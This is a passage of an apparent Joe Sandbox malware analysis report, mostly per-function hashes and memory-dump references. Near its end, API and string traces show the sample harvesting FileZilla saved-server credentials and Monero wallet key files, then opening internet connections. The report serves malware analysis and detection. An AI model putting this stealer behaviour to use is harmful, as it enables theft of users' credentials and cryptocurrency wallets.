                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: b=$b=
                          • API String ID: 0-796697774
                          • Opcode ID: a1e768003e032484b798cfe17104ddcab1ef201552891cea25c42767fba158f4
                          • Instruction ID: cd18ed3dc74a45ff62c29bcc598d66ba461db4e09f250b58b06623d8952deb16
                          • Opcode Fuzzy Hash: a1e768003e032484b798cfe17104ddcab1ef201552891cea25c42767fba158f4
                          • Instruction Fuzzy Hash: 2951F8F3B186005BE3049A2DEC8577BB7D7EBD4720F1AC53DE68987788E93898058256
                          Function 008A7ADC Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )Xz_
                          • API String ID: 0-2966789561
                          • Opcode ID: 1a5265cbc28c8fc2b3269aa7c2e869dda07ae2a116f7fb19790271b150d02901
                          • Instruction ID: af1aae0c0086bebbbffa30a57a7c457ec093cb82abb898bc7b9cd73515c190a1
                          • Opcode Fuzzy Hash: 1a5265cbc28c8fc2b3269aa7c2e869dda07ae2a116f7fb19790271b150d02901
                          • Instruction Fuzzy Hash: 397126F3E192149FE3046E29DC4536AF7E6EF94720F1B893DDAC493784EA3918448786
                          Function 007BE9D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *f?o
                          • API String ID: 0-658665761
                          • Opcode ID: 2a1992e0b501e2d9696dbf7b3ba5ade82e19400bc40c5ccf353b46db6ceb5b9e
                          • Instruction ID: 02a28e58dc3a28299c49775efc48df45dcbac1bdf886fe7148b401f1db5460bd
                          • Opcode Fuzzy Hash: 2a1992e0b501e2d9696dbf7b3ba5ade82e19400bc40c5ccf353b46db6ceb5b9e
                          • Instruction Fuzzy Hash: 3731C7F3F4431907F360686AECC8366B6CAABD4320F1F83359A5857BC5ECBA4C014145
                          Function 009E8E4B Relevance: .2, Instructions: 174COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f7c3e448f1b772a8aec57f349336b43b3c66dd2c31c1a59a5ad1487d1c90d10
                          • Instruction ID: 5cb79baeb14f70d535ad9bbe8e5943aa8fe0fba72dd921a3b266d30b87215b65
                          • Opcode Fuzzy Hash: 6f7c3e448f1b772a8aec57f349336b43b3c66dd2c31c1a59a5ad1487d1c90d10
                          • Instruction Fuzzy Hash: 855128B310C344DFD306BAAA9C4553BB7A5EB50721F368D2DE2CA97240EA795C40A6D3
                          Function 007D6A6C Relevance: .2, Instructions: 164COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac79982bd3ec0ca5d463d1933108f952d5da7eaf3b26015f63d42d5a4c29618d
                          • Instruction ID: fcc39b1f92fad1c0f9e148b445869a6daba0991111f2351ff8ee18250882e371
                          • Opcode Fuzzy Hash: ac79982bd3ec0ca5d463d1933108f952d5da7eaf3b26015f63d42d5a4c29618d
                          • Instruction Fuzzy Hash: 904129F360C2009FF3046E39ED8577BBBDAEB94320F16463EE6C4C3684E63998058656
                          Function 0081CA65 Relevance: .2, Instructions: 151COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65cc3a3481a781b563bf4ebafcceed9c458866a5a19d63737b1ec8d979265ff7
                          • Instruction ID: 111d33414f7871fb70e38e5d5a8bb4739d1ed412e2a41e65f4aa943e5e77e171
                          • Opcode Fuzzy Hash: 65cc3a3481a781b563bf4ebafcceed9c458866a5a19d63737b1ec8d979265ff7
                          • Instruction Fuzzy Hash: 304149F3A085109FF704AE2DDC5577AB7DAEFD4320F16853DEA88D3744E93958028295
                          Function 00984D41 Relevance: .1, Instructions: 146COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d5d96600435933306ca0660c12775a18cc67add7a2d16c1c90b04af6f41ff3a8
                          • Instruction ID: 1e862498231f34bbb584393b8f642ec1f394013d078d97db1a8f36dffb2358ec
                          • Opcode Fuzzy Hash: d5d96600435933306ca0660c12775a18cc67add7a2d16c1c90b04af6f41ff3a8
                          • Instruction Fuzzy Hash: E1419EB250D201DFD304BE28DD8563AB7E9FF84710F228D2DE6C287344EA3969449B87
                          Function 008115F4 Relevance: .1, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3d9596f30efbe92f2e1bf6426edc8443427da3519ae9b7a1aea8a5eeb087ad7
                          • Instruction ID: 28794e6033b28b67fd1b5dabe5ad2f3ab5c9d31c88b77c3cb476c6face8b8a30
                          • Opcode Fuzzy Hash: e3d9596f30efbe92f2e1bf6426edc8443427da3519ae9b7a1aea8a5eeb087ad7
                          • Instruction Fuzzy Hash: AA4112F3E142108BE3046E7DDC9976ABAD4EF64220F0A053DEEC9CB744E56A6D04C382
                          Function 00A2C5AE Relevance: .1, Instructions: 88COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52345dc785ef9367e9b354f586e9d1221769aafc7f2a759b2f967b30be0d4055
                          • Instruction ID: bc852ae46bd1fa54b94a2f95e95b46f9b059e52f36fa01fdcd25705a0f42b7d0
                          • Opcode Fuzzy Hash: 52345dc785ef9367e9b354f586e9d1221769aafc7f2a759b2f967b30be0d4055
                          • Instruction Fuzzy Hash: B721A1B3A0C7049FE3516A09DC817AEF7EAEFD8724F16492DE7C483744EA3558108697
                          Function 00559750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00550250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00550369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00550571
                          • lstrcat.KERNEL32(?,url: ), ref: 00550580
                          • lstrcat.KERNEL32(?,00000000), ref: 00550593
                          • lstrcat.KERNEL32(?,00561678), ref: 005505A2
                          • lstrcat.KERNEL32(?,00000000), ref: 005505B5
                          • lstrcat.KERNEL32(?,0056167C), ref: 005505C4
                          • lstrcat.KERNEL32(?,login: ), ref: 005505D3
                          • lstrcat.KERNEL32(?,00000000), ref: 005505E6
                          • lstrcat.KERNEL32(?,00561688), ref: 005505F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00550604
                          • lstrcat.KERNEL32(?,00000000), ref: 00550617
                          • lstrcat.KERNEL32(?,00561698), ref: 00550626
                          • lstrcat.KERNEL32(?,0056169C), ref: 00550635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: cdcdd33828fab86723c7e09afa018945fbe7f6a277ce3f7366ce6328c3f1e469
                          • Instruction ID: 890e5a60138b8e5338ae85872fe00a0b76b981c7d16d9b34eefc3570d746bd86
                          • Opcode Fuzzy Hash: cdcdd33828fab86723c7e09afa018945fbe7f6a277ce3f7366ce6328c3f1e469
                          • Instruction Fuzzy Hash: EAD14271900109ABDB04EBF0DDAAEEE7B38FF54301F54851AF502A7091EF34AA49CB65
                          Function 00545960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
